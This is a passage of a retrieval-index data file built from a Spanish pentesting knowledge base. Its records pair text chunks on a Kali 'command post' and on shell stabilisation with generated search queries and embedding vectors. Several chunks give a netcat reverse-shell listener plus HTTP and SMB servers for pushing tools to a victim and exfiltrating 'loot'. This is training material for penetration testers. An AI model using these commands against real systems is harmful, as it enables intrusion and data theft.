0.03447, -0.1064, 0.01283, 0.11512, 0.03652, 0.07914, 0.0212, 0.00915, 0.07319, -0.10126, -0.13174, -0.0469, -0.058, -0.02021, 0.05737, 0.06907, 0.02839, 0.01319, 0.0402, 0.12872, -0.01799, 0.07295, 0.08971, 0.05387, -0.05988, -0.06949, 0.02996, -0.12063, 0.07063, 0.01812, -0.03254, 0.03291, -0.05517, 0.00376, -0.05495, 0.08154, 0.01133, -0.00514, 0.03579, -0.10518, -0.04801, 0.019, 0.0033, -0.07532, -0.10176, -0.00567, 0.01668, 8e-05, 0.01984, -0.07582, -0.01079, -0.00297, 0.10841, 0.01426, 0.0214, -0.00185, -0.04724, -0.02772, -0.06594, -0.05618, 0.02461, -0.06605, -0.09807, 0.03094, 0.01337, 0.07139, 0.04355, 0.09125, -0.02947, 0.05126, 0.0902, -0.01377, -0.08379, -0.07389, -0.0174, -0.00787, 0.01919, 0.06299, 0.03457, -0.10094, -0.03576, 0.08523, 0.03779, 0.00671, -0.02461, -0.01455, 0.0187, 0.00152, 0.07455, -0.01018, 0.0034, -0.07978, -0.00365, 0.00752, 0.03261, -0.02327, 0.0722, -0.01231, -0.03924, 0.09754, -0.00649, 0.01166, -0.0627, -0.05645, 0.00613, -0.01736, 0.04432, -0.01704, -0.0129, -0.04295, 0.0016, 0.00228, 0.05827, 0.05744, -0.01755, 0.02021, 0.08222, -0.00589, 0.03146, 0.0512, -0.01378, 0.02357, 0.05297, -0.079, -0.01502, -0.01828, 0.0147, -0.00919, -0.03181, 0.04325, 0.04239, -0.06038, 0.09081, -0.01322, 0.04089, -6e-05, 0.03144, 0.06311, -0.0436, -0.02504, 0.00803, 0.08551, 0.00023, 0.01898, 0.01557, -0.02805, 0.02403, 0.05028, -0.00695, -0.04387, -0.03781, -0.03014, 0.00342, 0.00525, 0.0076, 0.02053, 0.03582, 0.00269, 0.03185, -0.02713, 0.02845, 0.01244, -0.00022, -0.01363, -0.11019, -0.00571, 0.07785, -0.0443, -0.09498, -0.04872, -0.06185, -0.04442, -0.02854, 0.00455, -0.07066, -0.05528, 0.01149, 0.06636, -0.02419, -0.02616, 0.00617]} -{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la vΓ­ctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "indexar": "que alternativa hay a Kali Linux para ejecutar herramientas de penetraciΓ³n desde mΓΊltiples terminales?", "v": [0.07941, 0.05181, -0.11738, -0.1387, 0.00027, -0.07626, -0.10572, 0.06871, -0.0981, 0.07358, -0.07628, 0.00681, 0.06165, -0.05418, 0.15326, 0.04518, -0.08489, -0.22062, 0.07141, -0.12833, -0.09737, 0.09553, -0.14716, -0.01653, 0.00401, 0.05703, 0.00515, -0.10489, -0.0296, -0.05642, -0.03634, 0.0225, 0.07583, -0.07458, -0.04067, 0.01425, -0.06618, 0.08049, 0.10176, 0.06203, 0.08425, 0.01139, -0.04811, 0.04043, 0.01751, -0.13003, 0.04237, 0.01951, 0.05029, -0.08003, 0.05155, 0.00632, -0.1227, -0.02267, 0.09045, -0.08881, 0.22077, -0.12281, 0.00645, -0.09974, -0.11775, -0.00128, -0.0033, 0.05289, 0.08132, 0.01948, -0.0554, -0.02893, -0.09938, 0.13088, -0.00486, 0.10804, -0.02782, -0.0032, -0.03239, -0.01824, -0.0917, 0.07944, 0.0463, 0.07567, 0.02613, -0.0563, -0.02799, 0.01195, -0.09595, -0.17415, -0.00423, -0.00598, -0.03753, 0.03251, 0.09034, 0.05413, -0.0299, 0.1448, 0.07893, 0.02573, 0.07681, 0.05318, -0.03482, 0.04825, 0.06762, 0.04396, -0.08268, 0.09355, -0.00033, 0.00459, -0.01274, -0.0126, 0.04679, -0.08431, 0.02458, -0.01307, 0.12299, -0.07578, -0.07287, -0.00256, -0.01466, -0.05065, -0.03997, -0.07453, -0.04116, 0.00228, -0.04415, -0.05119, 0.0052, -0.0545, -0.07185, 0.0245, 0.04704, -0.07206, 0.09933, -0.09847, 0.02963, 0.042, -0.05183, 0.0572, 0.11251, -0.15774, -0.0192, -0.0367, 0.06118, 0.07176, -0.02305, -0.06909, 0.11459, 0.02634, -0.03538, -0.03175, -0.00844, -0.02926, -0.00869, -0.05635, -0.05291, 0.06305, -0.05268, -0.01654, -0.03628, 0.0005, -0.08883, 0.10553, -0.02404, -0.06462, -0.00855, 0.02117, -0.04935, 0.00765, -0.04235, -0.0037, 0.02745, -0.01955, 0.02266, 0.12274, 0.00702, -0.01821, -0.01136, -0.08816, 0.03415, -0.05081, 0.03006, -0.01055, -0.00567, 0.03875, -0.05613, -0.0621, 0.02542, 0.01139, -0.05205, 0.02297, 0.01261, 0.04161, 0.00717, 0.0423, -0.04485, -0.04231, 0.04848, 0.00074, -0.00886, -0.01317, -0.06352, -0.03168, -0.04595, 0.08372, 0.03954, -0.05159, 0.05197, 0.02122, -0.10111, -0.0002, -0.04086, 0.04373, -0.01029, 0.0189, 0.04937, -0.01198, -0.02358, -0.05831, -0.00712, 0.05018, 0.00667, 0.04163, 0.00982, -0.02004, 0.04946, -0.00225, -0.04594, -0.01421, -0.02939, 0.00854, -0.01464, -0.02213, 0.04242, 0.0044, 0.01706, -0.01473, 0.00753, -0.02698, 0.00901, -0.00303, -0.00293, -0.03266, 0.00018, 0.04616, 0.02569, 0.00385, -0.07799, -0.03532, -0.05539, -0.03776, -0.02887, -0.05252, -0.00083, 0.0588, 0.02529, -0.03785, -0.03751, -0.03068]} -{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la vΓ­ctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "indexar": "como hago para gestionar varias herramientas independientes y coordinarlas como si fuera un puesto de mando?", "v": [0.09966, 0.12123, -0.195, -0.08791, -0.11816, -0.04574, -0.01261, 0.07034, -0.15215, -0.12067, -0.09715, -0.0334, 0.03553, -0.05996, 0.09245, 0.13313, 0.09578, -0.06838, -0.07813, 0.04293, -0.10572, 0.06183, 0.08637, 0.02524, 0.01417, -0.10068, 0.10359, -0.0933, -0.18127, 0.07602, -0.0209, 0.01925, -0.01454, -0.08475, -0.0025, -0.09637, -0.11055, 0.03749, -0.02884, 0.02741, -0.13603, 0.03506, -0.03726, 0.00515, 0.06741, -0.01095, -0.03129, -0.03356, 0.09755, 0.13468, -0.05934, -0.11951, -0.00346, -0.03819, 0.04924, -0.10085, 0.1586, -0.08493, -0.02288, -0.10966, -0.06957, 0.1169, -0.02105, 0.15112, 0.02438, 0.04648, 0.01999, -0.15787, -0.06214, 0.02771, -0.06564, 0.05607, -0.04855, 0.03479, 0.0681, 0.01605, 0.03753, 0.10558, 0.06799, -0.05451, 0.00349, -0.0613, -0.0093, 0.08001, -0.10238, -0.13148, 0.06096, -0.09519, -0.00883, -0.03016, 0.00369, -0.00859, -0.1425, -0.09699, -0.00959, 0.05283, 0.03975, 0.04181, 0.06601, 0.00109, 0.06556, -0.01527, -0.09681, 0.07581, -0.00257, 0.1057, 0.04917, 0.00524, 0.00561, 0.03916, -0.0986, 0.02697, 0.01793, 0.01349, -0.01497, -0.00451, -0.0394, -0.01053, 0.03493, -0.01278, -0.0082, -0.06046, 0.06525, 0.01439, 0.08622, -0.04546, -0.00555, 0.04206, 0.06131, 0.06836, -0.01647, -0.01913, -0.00066, -0.04588, 0.03462, 0.02281, -0.04754, -0.00359, -0.03637, -0.13855, -0.11197, 0.06346, 0.04087, -0.10757, 0.11084, -0.01575, -0.02416, -0.06182, 0.01479, 0.01479, -0.03535, -0.00129, -0.00172, 0.10838, -0.04253, 0.04614, -0.07349, 0.02995, -0.0553, 0.01403, -0.06936, -0.04206, -0.01915, 0.00357, 0.06965, 0.00934, -0.00308, 0.04478, -0.00623, -0.01795, -0.04, 0.01313, -0.0144, -0.02459, -0.01934, -0.12297, -0.04799, -0.05183, 0.05987, 0.02721, 0.04877, 0.02303, -0.06148, 0.00828, 0.02709, -0.00019, -0.00483, -0.01505, 0.01116, 0.05606, 0.01557, 0.03917, -0.00067, -0.05891, 0.05913, 0.0231, -0.02689, -0.03772, -0.01462, -0.00345, -0.01771, 0.01876, 0.01925, -0.03283, -0.019, 0.00367, -0.08364, 0.09168, 0.04463, 0.05937, 0.08706, -0.01929, 0.02343, 0.00221, -0.04468, -0.04209, 0.02516, -0.01317, -0.00345, -0.02067, 0.05276, 0.03288, 0.07077, -0.06245, -0.00936, 0.06082, 0.03237, 0.05584, 0.05279, 0.07082, -0.00666, -0.00541, -0.02162, 0.00326, 0.01191, -0.00143, 0.08975, -0.01948, -0.02744, -0.00502, 0.01471, 0.03131, -0.0253, -0.02873, -0.08869, -0.07388, -0.06826, 0.04167, -0.02326, -0.01868, -0.02118, 0.0297, 0.07065, 0.00893, 0.00658, -0.02562]} -{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Los 4 terminales\n```\nTerminal 1 β€” listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 β€” HTTP para servir tus tools a la vΓ­ctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 β€” SMB para que la vΓ­ctima TE envΓ­e ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 β€” tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilΓ­zala β†’ Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering Β· OSCP MOC", "indexar": "que programa sirve para recibir una conexiΓ³n shell desde una vΓ­ctima?", "v": [-0.09702, 0.0938, -0.16519, -0.19108, -0.05961, -0.14669, -0.16979, -0.07233, 0.09226, -0.04266, 0.00662, -0.04862, 0.036, -0.08106, -0.00427, -0.01874, 0.04389, -0.00084, 0.1109, 0.00545, -0.02143, 0.07726, 0.03458, -0.07894, -0.12564, 0.13009, 0.08976, 0.05449, 0.00955, -0.00399, 0.02733, -0.22788, -0.04213, -0.0085, 0.09035, -0.02414, -0.04549, 0.04917, 0.08016, 0.09004, 0.09135, -0.08052, -0.06894, 0.06382, 0.14386, -0.02559, 0.0064, -0.01848, 0.07371, 0.09419, -0.03212, 0.04826, -0.18554, -0.09775, 0.00757, -0.03424, 0.00365, -0.17949, 0.10897, 0.03106, -0.06397, -0.0282, 0.06903, -0.04378, 0.08807, -0.05043, 0.10374, 0.01172, -0.07832, -0.02402, 0.00166, -0.05285, 0.01532, -0.04397, -0.04954, -0.02604, 0.03477, -0.00299, 0.01996, -0.02882, 0.0003, -0.02775, -0.03752, 0.09653, -0.06478, 0.0929, 0.12574, -0.03698, 0.05378, -0.07375, 0.08422, 0.0209, 0.04375, 0.07217, 0.03927, -0.13313, 0.00823, -0.11463, 0.02753, -0.01343, 0.13698, -0.12951, -0.02122, 0.1232, -0.00285, -0.02748, 0.01614, 0.04028, -0.09171, 0.07243, -0.01435, 0.02057, 0.0235, -0.03682, -0.13018, -0.04003, -0.0119, -0.07119, 0.06332, -0.00402, -0.02886, 0.07123, -0.02525, 0.02497, 0.02433, 0.01511, -0.02855, 0.03813, -0.01354, 0.07001, 0.00861, 0.08276, 0.01782, 0.00346, 0.00263, -0.04262, 0.0774, -0.05153, 0.03142, -0.0606, 0.08817, 0.05861, -0.08204, 0.01883, -0.04749, -0.06403, 0.04368, -0.032, -0.04614, 0.00361, 0.04253, -0.00439, -0.02239, -0.00563, -0.11224, -0.03925, -0.01945, 0.00378, 0.00752, 0.05843, -0.02748, -0.02553, -0.03617, 0.00338, 0.04893, -0.10041, -0.02321, -0.00895, 0.16036, 0.11054, 0.01417, 0.05324, 0.02187, 0.01198, -0.04874, -0.07185, -0.00948, -0.06925, -0.02107, -0.01125, -0.04543, 0.0144, -0.00876, -0.00118, 0.00449, -0.02022, -0.03382, 0.00747, -0.02849, 0.04963, 0.02064, 0.01735, 0.0037, 0.03673, -0.01974, -0.05602, -0.02322, 0.03277, -0.01448, -0.00224, -0.09427, 0.04194, 0.04257, -0.03763, 0.04361, 0.08258, -0.02581, -0.06353, 0.0147, 0.08789, -0.00227, 0.04527, 0.05036, 0.00439, 0.0334, -0.03754, 0.0474, 0.02707, 0.07995, 0.09699, -0.04201, -0.0534, -0.0127, 0.04945, 0.03926, -0.05449, -0.01999, 0.04068, -0.02817, -0.02747, -0.02785, -0.04031, 0.00613, -0.04967, -0.01653, -0.05164, -0.02306, -0.01494, -0.04659, -0.0366, -0.04166, 0.07398, -0.0244, -0.03605, 0.02814, 0.03546, -0.03062, -0.01756, 0.00372, -0.02663, -0.04735, 0.05726, 0.0545, -0.03745, 0.007, 0.00326]} -{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Los 4 terminales\n```\nTerminal 1 β€” listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 β€” HTTP para servir tus tools a la vΓ­ctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 β€” SMB para que la vΓ­ctima TE envΓ­e ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 β€” tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilΓ­zala β†’ Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering Β· OSCP MOC", "indexar": "con que puedo hacer un servidor HTTP simple sin instalar nada?", "v": [-0.04744, 0.09753, -0.22512, -0.09591, -0.03174, -0.12895, -0.02023, -0.07813, 0.03657, 0.05364, -0.18743, 0.00457, 0.02302, -0.06919, 0.07902, 0.05939, 0.13503, -0.12053, 0.07628, -0.01095, -0.00247, 0.0069, -0.00997, -0.04434, -0.05511, -0.02428, 0.04118, 0.06774, -0.15753, -0.16669, 0.02201, -0.05798, -0.03056, 0.11402, -0.05703, -0.03028, -0.05662, 0.08854, -0.02249, 0.04897, 0.04515, 0.06516, 0.01672, 0.08798, -0.07627, -0.01424, 0.05558, -0.1595, 0.11649, -0.09397, -0.01514, -0.05348, -0.17717, -0.03308, -0.08429, 0.10306, 0.14305, -0.18921, 0.05868, -0.09199, -0.10749, 0.05699, -0.01634, 0.04956, 0.08917, 0.01478, -0.03245, 0.03788, -0.10425, 0.01068, -0.05325, 0.03308, -0.01675, -0.08451, 0.08727, 0.10501, -0.06405, -0.05699, 0.03371, 0.08554, 0.0663, -0.01937, -0.00767, 0.02471, -0.08402, -0.09426, -0.04786, -0.04798, 0.08185, -0.05007, 0.10034, 0.08972, -0.06327, 0.00963, 0.0064, -0.11728, 0.09894, -0.03352, 0.01158, -0.0045, 0.00918, 0.04963, -0.01382, 0.07805, 0.04709, 0.06874, 0.12394, -0.04974, 0.02306, -0.11853, 0.06011, 0.01687, -0.07433, -0.00714, -0.01374, -0.03383, 0.00718, 0.01642, -0.00882, 0.01718, -0.09281, -0.09492, -0.04243, 0.04765, -0.01338, -0.04443, 0.03231, 0.04607, -0.00148, 0.02296, 0.01651, -0.073, -0.03306, 0.01184, -0.05431, 0.03783, 0.05527, -0.10851, -0.04198, -0.0349, 0.01195, 0.04548, -0.06442, -0.0333, 0.08873, 0.00164, 0.04388, -0.06664, -0.04886, -0.01148, 0.05224, 0.0125, -0.09605, 0.05071, -0.11118, -0.02766, 0.07479, -0.07334, 0.00136, 0.05576, 0.05674, 0.05259, 0.05574, 0.06273, 0.00562, 0.05526, -0.10162, 0.02973, 0.08034, 0.01759, -0.01925, 0.07295, -0.03122, -0.10786, 0.00128, -0.02511, -0.07249, -0.02386, 0.04558, 0.00294, -0.0113, 0.00382, -0.0171, 0.02672, -0.04232, -0.04213, 0.02162, -0.01722, -0.03726, 0.00673, 0.05218, 0.0186, -0.11826, 0.05629, 0.056, -0.00854, -0.02479, -0.04018, -0.01857, -0.01235, -0.05022, -0.0411, 0.01965, -0.05761, 0.01478, -0.01719, -0.03889, 0.04167, -0.02262, 0.02318, 0.01345, -0.02861, 0.07079, -0.06444, 0.00532, 0.01717, 0.07686, -0.02303, -0.01912, 0.00572, -0.01487, 0.01635, 0.00203, 0.00325, 0.03424, 0.00436, 0.04163, -0.01547, 0.05044, -0.00488, -0.06938, 0.01061, -0.04201, -0.01847, 0.05694, -0.00113, -0.0179, -0.02016, -0.06304, -0.03047, 0.03159, 0.04263, 0.00236, -0.04707, -0.00847, -0.07807, -0.0386, -0.01919, -0.03873, -0.03808, -0.02851, -0.03121, 0.04794, -0.03643, -0.01875, 0.01546]} -{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Los 4 terminales\n```\nTerminal 1 β€” listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 β€” HTTP para servir tus tools a la vΓ­ctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 β€” SMB para que la vΓ­ctima TE envΓ­e ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 β€” tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilΓ­zala β†’ Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering Β· OSCP MOC", "indexar": "cual es una herramienta libre para compartir archivos por SMB sin un servidor en segundo plano?", "v": [-0.03301, -0.01432, -0.1257, -0.17819, -0.16328, -0.2229, -0.09858, -0.16533, 0.0052, -0.02607, -0.14709, -0.02469, 0.09222, -0.12937, 0.0244, 0.08585, 0.14421, -0.1234, 0.02231, 0.03712, 0.01192, 0.09227, -0.04049, -0.05654, -0.071, -0.07562, 0.05285, 0.05225, -0.14287, 0.05009, -0.03009, -0.05905, 0.09766, -0.02277, 0.03552, -0.08146, 0.06177, 0.15172, -0.04566, 0.0192, 0.01111, -0.0233, -0.05391, 0.06719, -0.0404, -0.06967, 0.02025, 0.02764, 0.06303, 0.04859, -0.05003, -0.03726, -0.08712, 0.01805, -0.05762, -0.0694, 0.14955, -0.22329, -0.00201, -0.07983, -0.1467, 0.06911, -0.01563, -0.1111, -0.03548, -0.00818, -0.04768, 0.06051, -0.1191, 0.05207, 0.01133, 0.03166, 0.08087, -0.06632, -0.01927, 0.03697, 0.00459, 0.00417, -0.04377, 0.04322, 0.07305, -0.03437, -0.03102, 0.11047, -0.03679, -0.10516, 0.05797, 0.01649, 0.06631, 0.05513, -0.01279, 0.0569, -0.04715, 0.08837, 0.02495, -0.05587, 0.127, -0.02344, 0.01752, 0.02419, 0.17528, 0.02073, -0.09417, 0.07033, -0.0284, 0.11037, 0.06364, 0.05863, -0.04202, 0.0049, 0.10314, 0.04033, 0.03056, 0.09192, -0.08742, -0.01749, -0.01813, -0.02951, 0.03407, 0.00623, 0.00184, 0.03181, -0.056, -0.0199, -0.00113, -0.02622, 0.043, 0.06497, -0.06816, -0.03208, 0.03601, 0.0146, -0.01251, 0.00209, -0.11276, -0.03038, 0.0815, -0.10029, -0.07867, -0.07895, -0.00828, 0.01683, -0.0593, -0.02529, 0.08912, -0.0042, 0.09365, -0.07197, -0.05462, -0.02095, -0.0554, -0.02908, -0.00948, -0.00705, -0.064, 0.03114, -0.04628, -0.0382, -0.10138, 0.03321, -0.05391, -0.0011, 0.00664, 0.07829, 0.01702, -0.05312, 0.0298, -0.00417, 0.06772, 0.01813, 0.03149, 0.01005, 0.05551, -0.08517, 0.02051, -0.10813, -0.0164, -0.05638, 0.02008, -0.00754, -0.0024, -0.00188, -0.03639, 0.04763, -0.06268, -0.0736, 0.03234, 0.02565, 0.00018, 0.06163, 0.02691, 0.00539, -0.00193, -0.00947, 0.01665, -0.05152, -0.00557, -0.0179, 0.00639, -0.00547, -0.04829, -0.05389, -0.10346, 0.00764, -0.00505, -0.00071, -0.00644, -0.01258, 0.03462, 0.03866, -0.00738, -0.00324, 0.07525, -0.0616, -0.00814, 0.04572, 0.01503, 0.00863, 0.05428, -0.01647, 0.03222, 0.03197, 0.01588, -0.01287, 0.01106, 0.04815, -0.04184, 0.03292, 0.00672, -0.01771, -0.05404, 0.03361, -0.00993, 0.0136, 0.0414, -0.01043, 0.02121, -0.04232, 0.01573, -0.05371, -0.00916, 0.06483, 0.01786, -0.06531, -0.04521, -0.02644, -0.01378, -0.04961, -0.04204, -0.06717, -0.00901, -0.02102, 0.0451, -0.02412, -0.00555, -0.00234]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "indexar": "quΓ© programa me ayuda a estabilizar una shell en modo TTY?", "v": [-0.1384, 0.0466, -0.19921, -0.02635, 0.08976, -0.02071, -0.12092, -0.08577, 0.07097, 0.15038, -0.18258, 0.08326, 0.07838, 0.01688, 0.01828, 0.00332, 0.00013, -0.16162, 0.07715, 0.07609, 0.06577, -0.08735, -0.09495, -0.06605, -0.00791, 0.02273, 0.02148, -0.06388, -0.14692, -0.02877, 0.01823, -0.12905, 0.0044, -0.10329, -0.03523, 0.06775, 0.10927, -0.0236, -0.056, 0.12379, -0.07061, -0.15538, 0.17225, 0.00161, 0.17087, 0.0946, -0.01362, -0.04441, 0.05101, 0.01311, -0.05356, -0.05691, 0.00561, 0.02432, 0.07627, -0.05877, 0.07243, -0.15058, -0.00314, -0.01688, -0.1564, -0.0392, -0.00387, 0.05755, 0.05492, 0.056, 0.00718, -0.03663, -0.13479, 0.04622, -0.01772, -0.01738, 0.01611, -0.10857, -0.03156, 0.05868, -0.0147, -0.05711, 0.05129, -0.05425, -0.03266, 0.0262, 0.0315, 0.11394, -0.04213, -0.06879, -0.03123, -0.05806, -0.08713, -0.00241, 0.07824, -0.03366, -0.02345, 0.09999, -0.0243, -0.07158, 0.06475, -0.01562, 0.01406, 0.02141, 0.03582, -0.12624, -0.07732, 0.05801, -0.02695, -0.00337, 0.0748, -0.01731, -0.10945, 0.14379, 0.04703, 0.03388, 0.01907, -0.02172, -0.04067, 0.02833, 0.00499, -0.02968, 0.05232, -0.13463, -0.04538, 0.04729, -0.04735, 0.06969, 0.0179, 0.037, -0.01014, 0.12415, -0.03338, 0.03222, -0.01114, 0.04567, -0.02891, -0.04401, 0.00249, -0.01295, 0.01602, -0.06479, -0.00291, -0.06039, 0.01116, 0.06729, 0.03586, 0.05224, 0.05901, 0.01739, 0.06659, -0.0231, -0.02394, 0.06538, 0.07738, 0.10184, 0.03907, -0.01754, -0.03968, -0.06759, 0.02776, 0.0163, 0.00677, -0.02071, 0.00873, 0.03251, -0.00914, -0.07684, 0.01992, -0.09543, -0.0009, 0.06205, 0.01269, 0.02443, 0.00586, 0.03265, 0.04642, -0.01495, -0.0106, -0.07539, -0.03343, -0.05351, -0.01747, -0.00139, -0.03827, 0.03513, 0.07327, -0.01037, -0.00291, -0.02623, -0.01942, 0.03105, -0.00495, 0.02501, 0.02, 0.02249, -0.05263, -0.05636, -0.027, -0.02724, -0.01296, -0.07417, 0.06046, -0.04076, -0.05534, -0.02755, 0.05269, -0.07206, 0.04216, 0.05608, -0.0686, 0.04704, 0.10038, 0.07015, 0.01104, 0.02291, 0.04324, 0.09314, -0.0197, 0.04838, -0.01347, 0.05056, -0.00885, -0.00664, -0.00932, -0.02473, 0.07497, 0.08358, -0.02402, -0.04074, 0.07101, 0.05632, -0.01424, 0.04598, -0.03017, -0.09273, 0.02941, -0.04867, -0.00838, 0.00488, -0.02525, -0.04008, 0.01276, -0.0346, 0.02559, 0.07392, 0.00488, -0.05208, 0.01898, -0.01513, -0.03879, 0.04083, -0.00251, 0.01787, -0.05505, 0.0756, 0.03503, -0.08858, 0.07021, 0.02737]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "indexar": "con quΓ© puedo solucionar el problema de que no funcione Ctrl+C ni las flechas en mi terminal?", "v": [-0.04362, 0.06571, -0.19972, 0.01241, 0.00183, -0.17823, -0.01694, 0.06761, -0.04261, -0.04491, -0.15272, -0.01481, -0.00041, -0.07988, 0.13032, -0.11161, -0.08661, -0.15028, 0.08191, -0.10022, -0.1264, -0.16867, -0.03932, -0.02849, -0.11759, 0.07451, -0.05763, -0.01678, -0.11967, -0.13725, 0.01945, -0.07006, 0.22001, 0.01545, 0.04051, 0.07268, -0.07951, 0.00014, 0.01841, 0.09839, 0.03652, 0.04802, -0.12919, 0.03907, 0.03519, -0.07781, 0.07378, -0.05668, 0.00632, 0.06049, -0.08441, -0.09923, -0.06226, -0.08067, -0.07597, 0.0085, 0.11556, 0.0009, 0.06891, -0.06046, -0.10433, 0.04117, -0.00411, 0.06413, -0.01799, -0.06061, 0.03874, -0.05884, -0.04733, 0.12961, -0.08603, 0.07426, -0.0846, -0.00462, 0.02864, 0.05707, -0.10845, -0.04979, 0.11971, 0.0481, 0.04623, -0.01036, -0.07523, -0.13333, -0.02328, -0.08037, -0.02529, -0.0436, -0.07619, -0.00607, -0.02233, -0.01271, 0.07647, 0.02347, 0.01186, -0.06242, 0.08378, -0.02107, -0.00436, -0.0426, 0.13105, 0.01107, -0.07933, 0.11033, -0.01968, -0.07529, 0.06501, -0.10122, -0.00675, 0.04671, 0.06344, -0.01321, 0.08255, -0.03958, -0.17789, -0.04871, 0.00174, 0.01692, -0.05043, 0.05832, -0.07734, -0.05591, 0.01906, 0.04829, 0.04701, 0.05863, 0.029, 0.06717, -0.00562, 0.00615, -0.04138, -0.05298, 0.03153, -0.04657, -0.01328, 0.03542, 0.03679, -0.02623, -0.02196, 0.02749, 0.03091, 0.07328, 0.0488, -0.03594, 0.04245, 0.05464, -0.05928, 0.02423, -0.05273, -0.0305, 0.10146, -0.04219, 0.09604, 0.01417, -0.02605, 0.02415, 0.02079, 0.05577, 0.03125, 0.02905, -0.00871, -0.07331, -0.03011, 0.06827, 0.02317, -0.0406, -0.05537, 0.00673, 0.02847, 0.01289, -0.06583, 0.01634, -0.00494, -0.08667, 0.00402, -0.00772, 0.01322, -0.03524, 0.09911, -0.03889, -0.0321, 0.05143, 0.02146, 0.0542, -0.00095, -0.03894, 0.00013, -0.01335, -0.00286, 0.03732, 0.08176, -0.00036, 0.02872, -0.04459, -0.01867, 0.03803, -0.0193, -0.10537, -0.00864, -0.0609, -0.0331, 0.05618, 0.08039, -0.00287, 0.0818, 0.02166, -0.05844, 0.0244, 0.0699, -0.00061, 0.01364, 0.02813, 0.06211, -0.0007, 0.0226, -0.03408, -0.03353, 0.05838, -0.02863, -0.02204, 0.08305, 0.03099, 0.05841, 0.01797, 0.05438, 0.01446, 0.04609, 0.05724, 0.01375, 0.06241, 0.01848, 0.05329, -0.05843, -0.01619, -0.01731, -0.01703, 0.01185, -0.06895, -0.02137, -0.02878, 0.06666, 0.04617, 0.01452, 0.00384, -0.01469, -0.02861, 0.00678, 0.00398, -0.0543, -0.03056, -0.02618, -0.01211, 0.04292, -0.02971, 0.0231, 0.00996]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "indexar": "que herramienta sirve para reparar una shell que ha perdido soporte bΓ‘sico como sudo o las teclas de navegaciΓ³n?", "v": [0.16878, 0.00711, -0.25269, -0.14672, 0.01004, -0.08426, -0.08057, -0.06284, 0.05043, -0.00937, -0.19646, 0.03006, -0.01507, -0.11715, 0.04929, 0.01451, -0.056, -0.13683, 0.06523, 0.00939, 0.01647, 0.03243, -0.05867, -0.02146, -0.03729, 0.00642, 0.0987, -0.05105, -0.17754, -0.00077, -0.08088, -0.04306, 0.022, -0.07724, -0.12825, -0.0308, -0.03935, -0.08131, -0.02718, 0.10495, -0.0004, -0.0258, -0.01621, 0.0518, 0.00447, -0.02611, 0.02456, 0.0256, -0.02315, 0.05501, 0.02352, -0.17892, -0.10942, -0.04895, -0.01239, -0.02876, 0.30197, -0.13451, 0.0123, -0.15324, -0.16761, 0.019, 0.0813, 0.04612, 0.0164, -0.05089, -0.00854, -0.13583, -0.0945, 